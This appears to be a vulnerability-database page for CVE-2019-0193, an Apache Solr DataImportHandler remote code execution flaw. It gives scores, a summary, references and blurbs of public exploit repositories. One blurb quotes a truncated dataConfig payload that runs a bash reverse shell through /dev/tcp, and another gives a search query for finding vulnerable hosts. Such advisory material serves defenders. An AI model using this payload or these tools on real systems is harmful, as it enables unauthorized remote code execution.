
CVE-2019-0193

Published: 01/08/2019 Updated: 07/11/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 804
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

Vulnerable Product

apache solr

Vendor Advisories

Impact: Important Public Date: 2019-07-31 CWE: CWE-20 Bugzilla: 1736774: CVE-2019-0193 solr: Remote Cod ...

Mailing Lists

oss-sec mailing list archives: [CVE-2019-0193] Apache Solr, Remote Code Execution via DataImportHandler ...

Github Repositories

Apache Solr Remote Code Execution Vulnerability (CVE-2019-0193) Exploit

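Disclaimer: The vulnerability detection methods, files and other content provided here are only for use by security practitioners who have obtained legal authorization, for the purpose of testing the security of authorized servers. Security practitioners must comply with the law; performing any vulnerability testing without authorization is prohibited. Introduction: Vulnerability analysis - Apache Solr Remote Code Execution Vulnerability (CVE-2019-0193) - Xianzhi Community 理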

Apache Solr RCE via Velocity template

solr-cve-2019-0193 Apache Solr RCE via Velocity template. Usage: python3 solr-rcepy -f urltxt python3 solr-rcepy -url wwwgooglecom Reference: gistgithubusercontentcom/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1txt

Yisaitong (亿赛通) Electronic Document Security Management System-rce-exp

CNVD-2021-26058 Yisaitong (亿赛通) Electronic Document Security Management System-rce-exp. Cause of the vulnerability: the product uses Apache Solr, vulnerability ID: CVE-2019-0193. Fofa "电子文档安全管理系统" && country!="CN" Script usage: ~# python3 yisaitong-exppy -h usage: yisaitong-exppy [-h] [-u URL] [-c CMD] [-f FILE] [-k SKIP] 亿赛

Vulnerability Environment Reproduction

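Apache-Flink未授权访 Vulnerability environment reproduction: Apache Solr CVE-2019-0193 environment setup and vulnerability reproduction. Vulnerability environment reproduction: Tomcat CVE-2017-12617 environment setup and exploit reproduction. Vulnerability environment reproduction. Note: this project is for study and reference only; use for any illegal activity is strictly prohibited!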


CVE-2019-0193 Remote Code Execution

Security & Development

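Public notes: SDL - Security Development Lifecycle: practice and significance; SDL - API design guidelines CheckList; NTA - network traffic analysis: packet capture practice (wireshark/Tshark); NTA - network traffic analysis: IDS/IPS principles, engines, rules (suricata); web - vul - SQLi: principles, exploitation methods, fixes; web - vul - SSRF: principles, exploitation methods, fixes; web - vul - XSS: principles, exploitation methods, fixes; web - vul - CSRF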

Apache Solr DataImport Handler RCE

CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v812) python usage python CVE-2019

CVE-2019-0193-exp 1 <dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(row){ var bufReader = new javaioBufferedReader(new javaioInputStreamReader(javalangRuntimegetRuntime()exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127001/9999 0&

Helps you find sensitive open ports, which usually leads to an easy RCE.

Easy RCE Scanner: script for the automation of your Pentest or Bug Bounty recon. It will help you find sensitive open ports, which usually leads to an easy RCE. Sensible Ports: IBM WebSphere : 8880, Apache Hadoop : 8088, Apache Spark : 6066, Apache Solr : 8983, Redis : 6379, Docker : 2375, 2376, Zoho Manageengine Desktop : 8383, Atlassian Crowd : 4990, Portainer : 9000, Hashicorp Consul

References

CWE-94
https://issues.apache.org/jira/browse/SOLR-13669
https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html
https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html
https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E
https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E
https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51%40%3Cdev.lucene.apache.org%3E
https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66%40%3Cdev.lucene.apache.org%3E
https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699%40%3Cissues.lucene.apache.org%3E
https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3E
https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E
https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3E
https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3E
https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3E
https://nvd.nist.gov
https://github.com/1135/solr_exploit
https://access.redhat.com/security/cve/cve-2019-0193